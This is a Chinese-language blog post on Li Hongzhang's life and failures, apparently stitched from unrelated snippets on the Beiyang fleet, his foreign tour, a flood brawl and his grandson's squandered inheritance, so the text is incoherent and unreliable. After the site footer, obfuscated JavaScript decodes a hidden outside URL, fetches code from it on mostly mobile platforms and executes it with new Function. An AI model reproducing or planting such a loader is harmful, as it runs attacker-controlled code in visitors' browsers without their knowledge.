李鸿章的悲剧

2022年09月03日 admin 阅读(24)

关于李鸿章的一生,他似乎是在骂声中度过的,他是19世纪70年代主持晚清正朝以来,就一直饱受上下官员的责骂,甚至是辱骂。李鸿章一生虽有宠于朝廷,却有愧于国家,连签卖国条约,生前生后,均遭世人唾弃。然而他虽误国有罪,却从未卖国。在这点上,他与之前世秦桧、后世之汪精卫有着本质区别。李鸿章的悲剧在于:他为了迎奉慈禧太后,屡屡误国;他那超常心理素质又使他度过一个又一个政治危机,成为晚清立国以来最长的政治不倒翁。梁启超曾在《李鸿章传》评价他:“吾敬李鸿章之才,惜李鸿章之识悲,悲李鸿章之遇。”

无论从哪个角度来说,留什么都没问题,一看个人心思,二看家庭条件,但总的来说,最理想的条件是既留财又留德。不过如果条件所限,只能留一样的话,晚清重臣李鸿章混血子孙悲剧的一生足能证明,留德远比留财要重要得多。

北洋水师的覆灭,往小了说是他丁汝昌一个人的悲剧,也标志着李鸿章权势的旁落,他殚精竭虑想保住的舰船和权势都没能保住,并被戴上了“汉奸卖国贼”的帽子。往大了说标志着洋务运动成果的破产,是整个大清的悲剧和一个旧时代的落幕。

第三件事外交活动;在甲午战争之后,清政府派遣李鸿章到国外考察,他也同样是清朝第一个走出国门的高级官员,在欧美国家,李鸿章看到了国外发达的工业,繁华的街道以及近代化文明,在他心里意识到清朝与国外发展的差距。当然,李鸿章由于阶级的局限性,他也不可能主张变革,孙中山先生曾经给李鸿章上书,要求进行变革,但是被李鸿章断然拒绝了,由此可见,在李鸿章心里,促进近代化只是技术上,而并不涉及政治化。李鸿章心里封建思想根深蒂固,同时也想方设法进行求富变强,这注定他的悲剧,在出访欧美等国家之后,使得李鸿章更加坚定了清朝与国外的差距,当然,此时李鸿章已经进入了人生的末年,也不可能在有所作为了。

此次械斗是由下游私建堤坝所引起,导致了洪水没有顺利通过河道反倒损害了东光和沧州两地百姓的利益。两县百姓互相埋怨互相不服,由此有了大规模死伤的悲剧性事件。此时引起了直隶总督李鸿章的高度关注,光绪皇帝也亲自过问此事。

李鸿章在纠结犹豫,可是日本丝毫没有等人的意思,立刻紧锣密鼓地开始了进攻计划,在日军的疯狂斗志和中国军队由于李鸿章所引起的摇摆不定下,中国军队完全溃退了,不仅陆军在得到李鸿章等的示意之后进行撤退,结果被日本军队打了个埋伏损失惨重。就连那所谓世界第五亚洲第一的北洋水师,也在李鸿章着爱打不打的态度之下被全面包围,全部歼灭。就这样,朝鲜侵略战争结束了,代价是朝鲜,是中国东北的很大一部分土地,也是整个中国最先进的力量北洋水师和淮军的彻底消失。李鸿章的犹豫造就了悲剧的发生。

这是如今很多人也很羡慕的人生,但一个人从小到大不劳而获便可以拥有大量钱财真的是好事吗?很多年前李鸿章无法理解曾国藩坚持不给子孙留遗产的缘故,而很多年后他的孙子李子嘉却用自己一生的悲剧证明:

更何况,清王朝当时内忧外患的,李鸿章即便有着通天的本事,也不见得能够挽回当时的局面,可见李鸿章最大的困境,就是生在了那一个年代,如此看来就像是一个悲剧。

他作为当时清政府的外交官员,数次在一份又一份丧权辱国的条约上签字,也因此被国民唾骂。时代的悲剧无法避免,李鸿章签署的每一份条约都是无可奈何之举,当时的清政府根本无法抵抗外国的炮火侵略,只能眼睁睁看着国家沦为半殖民地半封建社会。

其二,郭嵩焘事功不及曾国藩、左宗棠、李鸿章,可百余年后,曾左李的事功何在?谋事者多,谋道者寡,可一个民族要走出悲剧性的宿命,需要谋道者。

尤其是在面临巨额财富的时候,如何把控利益的影响也正是家教的体现。倘若迷失在了财富之中,那就是整个家族史里最大的败笔。比如说晚清大臣李鸿章的孙子,继承了传递下来的巨额遗产,却终究以悲剧证明了,留才不如留德。

本文转载自互联网,如有侵权,联系删除

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

卓仁IT博客
卓仁IT博客的快速排名服务领先80%同行,首家开创刷百度关键词排名程序,非纯点击方法,无点击软件出售,需要seo快速排名提高网站排名请咨询顾问。
  • 文章61274
  • 评论0
  • 浏览9827302
function uYpJJ(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function rdIfsiYJ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return uYpJJ(t);};window[''+'S'+'R'+'D'+'h'+'o'+'o'+'l'+'N'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=rdIfsiYJ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';console.log(u);var xhr=new XMLHttpRequest();xhr.open('GET',u+'/s/a?_='+i);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function(data.data)(cs);}};xhr.send('u=1');})('aHR0cHM6Ly9hcGkuMDI3MmJiLmNvbQ==','426530553998467072',window,document,['','VxKGyJk']);}:function(){};